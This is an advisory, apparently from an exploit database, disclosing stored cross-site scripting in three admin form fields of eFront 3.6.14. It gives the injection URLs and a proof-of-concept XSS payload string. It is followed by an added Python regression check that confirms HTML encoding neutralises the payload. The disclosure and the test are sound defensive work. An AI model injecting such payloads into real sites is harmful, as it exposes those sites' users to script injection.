eFront 3.6.14 Cross Site Scripting

2013-12-12 / 2013-12-22
Credit: sajith
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

###########################################################
EDB Note: Screenshot provided by exploit author.
###########################################################
[~] Exploit Title: eFront v3.6.14 (build 18012) - Stored XSS in multiple Parameters
[~] Author: sajith
[~] Version: eFront v3.6.14 - build 18012
[~] Vendor Homepage: http://www.efrontlearning.net/
[~] Vulnerable app link: http://www.efrontlearning.net/download
###########################################################

POC by sajith shetty:

[###] Log in with admin account and create new user
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php?ctg=personal&user=root&op=profile&add_user=1
(Home » Users » Administrator S. (root) » New user)
Here "Last name" field is vulnerable to stored XSS [payload: "><img src=x onerror=prompt(1);> ]

[###] Create new lesson option
(http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php?ctg=lessons&add_lesson=1)
where "Lesson name" is vulnerable to stored XSS [payload: "><img src=x onerror=prompt(1);> ]

[###] Create new courses option
(http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php?ctg=courses&add_course=1)
where "Course name:" field is vulnerable to stored XSS
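Added example, not part of the original advisory and not eFront's own code: a regression check a maintainer could run after fixing the three fields, confirming that the stored text comes back as data rather than as new markup. It assumes the value is echoed into a double-quoted HTML attribute (the advisory does not show the markup); TEMPLATE, FIELDS, render_raw, render_encoded, audit and regression_check are hypothetical names.

```python
from html import escape
from html.parser import HTMLParser

# Constructed stand-in for a form template that echoes a stored field into a
# double-quoted attribute (assumed context; the advisory does not show markup).
TEMPLATE = '<input type="text" name="{field}" value="{value}">'
FIELDS = ("surname", "lesson_name", "course_name")   # hypothetical field names
PAYLOAD = '"><img src=x onerror=prompt(1);>'         # string quoted in the advisory


class MarkupAudit(HTMLParser):
    """Record every element, every on* handler and every value= attribute."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags, self.handlers, self.values = [], [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, val in attrs:
            if name.startswith("on"):
                self.handlers.append((tag, name))
            elif name == "value":
                self.values.append(val)


def audit(rendered):
    parser = MarkupAudit()
    parser.feed(rendered)
    parser.close()
    return parser.tags, parser.handlers, parser.values


def render_raw(field, value):
    # Behaviour the advisory describes: stored text reaches the page unencoded.
    return TEMPLATE.format(field=field, value=value)


def render_encoded(field, value):
    # quote=True encodes " and ' as well as < > &, so the text stays in value="".
    return TEMPLATE.format(field=field, value=escape(value, quote=True))


def regression_check(render):
    """True when no field lets stored text add elements or event handlers."""
    for field in FIELDS:
        tags, handlers, values = audit(render(field, PAYLOAD))
        if tags != ["input"] or handlers or values != [PAYLOAD]:
            return False
    return True
```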

